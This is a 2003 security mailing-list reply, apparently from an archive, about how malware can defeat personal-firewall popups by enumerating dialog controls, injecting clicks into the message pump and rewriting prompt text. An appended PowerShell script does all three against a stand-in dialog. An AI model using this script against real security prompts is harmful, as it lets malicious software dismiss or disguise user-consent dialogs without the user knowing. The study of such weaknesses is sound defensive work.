> > From: nowak.aat_private [mailto:nowak.aat_private]
> > Sent: Monday, August 11, 2003 5:15 PM
> >
> > > I suppose a simple defense for "personal firewall" vendors
> > > against this sort of thing would be to use hard-to-guess window
> > > titles for their popups...
> >
> > This simple defense may not be enough, as there are ways to
> > find out the names of all "child" windows belonging to a specific
> > process.

You'd have to change all the window classes too. It wouldn't be too difficult, depending on how the app works. You could just generate a random string to pre/post-fix.

> to require that the window be visible when the event is
> received, and have been visible for some minimum time (even on the order of a
> few seconds), which would allow an alert user to see the trojan in action, anyway.

Another way could be to track mouse movements, or keypresses. The problem is, there is just no way to prevent another app from "spoofing" user input directly into the message pump (unless you use GetAsyncKeyState() etc, but that's a very unreliable way to check for input in a win32 app). Also, consider the case of TweakUI, where you can configure it to pop the mouse to the OK (default) button of any messagebox. Just trying to force the prompt to be visible leaves a whole bunch of other possibilities out too - resize it to 1 pixel, move it offscreen etc...

> Is there a reliable mechanism in Windows for distinguishing
> between real and spoofed events? I've never looked into the subject, as I
> avoid GUI-mode programming like the plague (which is an apt description, in my book).

As I said above, no, not reliably. You can throw whatever you want into a process' message pump. One way may be to totally randomise the more important messageboxes. Randomly generate a title and string for the buttons, and alter the tab order and default button (similar to how the unregistered version of Winzip swaps its buttons around).
That would probably double the frustration for the user, but would make it harder for the prompt to be automatically dismissed.

I can think of another possibility too. Instead of automatically dismissing the messagebox, the malicious app could just rewrite the caption text in the prompt. "Spyware detected, allow access?" could become "Would you like some ice cream?". Now who could say no to that....

Ian Kayne
Technical Specialist - IT Solutions
Softlab Ltd - A BMW Company
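The three points made in the message above (child windows of a dialog can be enumerated regardless of its caption, a button press can be posted straight into the target's message pump, and the prompt text can be rewritten in place) as an added, runnable example that is not part of the original post. It is plain Win32 via P/Invoke from Windows PowerShell 5.1 or later; the "Personal Firewall" dialog it operates on is a constructed stand-in (a MessageBox spawned in a second process), not any vendor's product, and the function names are the author's own. One caveat not available in 2003: on Vista and later, User Interface Privilege Isolation silently drops messages posted to a window owned by a higher-integrity process, so this only works against a prompt running at the same or lower integrity level as the sender.

```powershell
# Added example (not from the original post). Assumes Windows PowerShell 5.1+ and a
# dialog on the same desktop at the same or lower integrity level (UIPI on Vista+
# drops messages aimed at a higher-integrity window).
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.Runtime.InteropServices;
public static class U32 {
    public delegate bool EnumChildProc(IntPtr hWnd, IntPtr lParam);
    [DllImport("user32.dll", CharSet=CharSet.Unicode)] public static extern IntPtr FindWindow(string cls, string title);
    [DllImport("user32.dll")] public static extern bool EnumChildWindows(IntPtr parent, EnumChildProc cb, IntPtr lp);
    [DllImport("user32.dll", CharSet=CharSet.Unicode)] public static extern int GetClassName(IntPtr h, StringBuilder sb, int n);
    [DllImport("user32.dll", CharSet=CharSet.Unicode)] public static extern int GetWindowText(IntPtr h, StringBuilder sb, int n);
    [DllImport("user32.dll")] public static extern int GetDlgCtrlID(IntPtr h);
    [DllImport("user32.dll", CharSet=CharSet.Unicode)] public static extern bool SetWindowText(IntPtr h, string s);
    [DllImport("user32.dll")] public static extern bool PostMessage(IntPtr h, uint msg, IntPtr wp, IntPtr lp);
    public const uint BM_CLICK   = 0x00F5;
    public const uint WM_COMMAND = 0x0111;
    public const int  IDOK       = 1;
}
"@

function Get-ChildControls {
    # Walk every child of a top-level window. A hard-to-guess caption on the dialog
    # itself does nothing to hide the class, text and control ID of its buttons.
    param([IntPtr]$Parent)
    $found = New-Object System.Collections.Generic.List[object]
    $cb = [U32+EnumChildProc]({
        param($h, $lp)
        $cls = New-Object System.Text.StringBuilder 256
        $txt = New-Object System.Text.StringBuilder 256
        [void][U32]::GetClassName($h, $cls, $cls.Capacity)
        [void][U32]::GetWindowText($h, $txt, $txt.Capacity)
        $found.Add([pscustomobject]@{ HWnd = $h; Class = $cls.ToString(); Text = $txt.ToString(); Id = [U32]::GetDlgCtrlID($h) })
        return $true
    }.GetNewClosure())
    [void][U32]::EnumChildWindows($Parent, $cb, [IntPtr]::Zero)
    return $found
}

function Invoke-DialogButton {
    # Press a button by its visible text (BM_CLICK). The message lands in the target's
    # pump exactly as a real click would; the dialog has no way to tell the difference.
    param([IntPtr]$Dialog, [string]$ButtonText)
    $btn = Get-ChildControls $Dialog |
        Where-Object { $_.Class -eq 'Button' -and ($_.Text -replace '&', '') -eq $ButtonText } |
        Select-Object -First 1
    if ($btn) {
        return [U32]::PostMessage($btn.HWnd, [U32]::BM_CLICK, [IntPtr]::Zero, [IntPtr]::Zero)
    }
    # Randomised button labels do not help while the control still answers to IDOK:
    # WM_COMMAND carries the control ID, not the caption, so IDs need randomising too.
    return [U32]::PostMessage($Dialog, [U32]::WM_COMMAND, [IntPtr]([U32]::IDOK), [IntPtr]::Zero)
}

function Set-DialogText {
    # The "ice cream" variant: leave the prompt on screen but rewrite what the user reads.
    param([IntPtr]$Dialog, [string]$NewText)
    $label = Get-ChildControls $Dialog |
        Where-Object { $_.Class -eq 'Static' -and $_.Text } |
        Select-Object -First 1
    if ($label) { return [U32]::SetWindowText($label.HWnd, $NewText) }
    return $false
}

# Constructed stand-in for a firewall prompt: a MessageBox in a separate process.
$target = Start-Process powershell -PassThru -ArgumentList @(
    '-NoProfile', '-Command',
    "Add-Type -AssemblyName System.Windows.Forms; [Windows.Forms.MessageBox]::Show('Allow outbound connection?','Personal Firewall')"
)
Start-Sleep -Seconds 2
$dlg = [U32]::FindWindow($null, 'Personal Firewall')
if ($dlg -eq [IntPtr]::Zero) { throw 'stand-in dialog not found' }

Get-ChildControls $dlg | Format-Table Class, Text, Id   # lists the Static prompt text and the "OK" Button with Id 1
Set-DialogText $dlg 'Would you like some ice cream?'    # prompt rewritten in place, still waiting for the user
Start-Sleep -Seconds 2
Invoke-DialogButton $dlg 'OK'                           # dismissed with no keyboard or mouse input at all
$null = $target.WaitForExit(5000)
```

Run it from an ordinary (non-elevated) console so both processes sit at the same integrity level. To see the UIPI caveat for yourself, start the stand-in dialog from an elevated console and the script from a normal one: PostMessage returns true, but nothing reaches the dialog.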
This archive was generated by hypermail 2b30 : Tue Aug 12 2003 - 08:59:30 PDT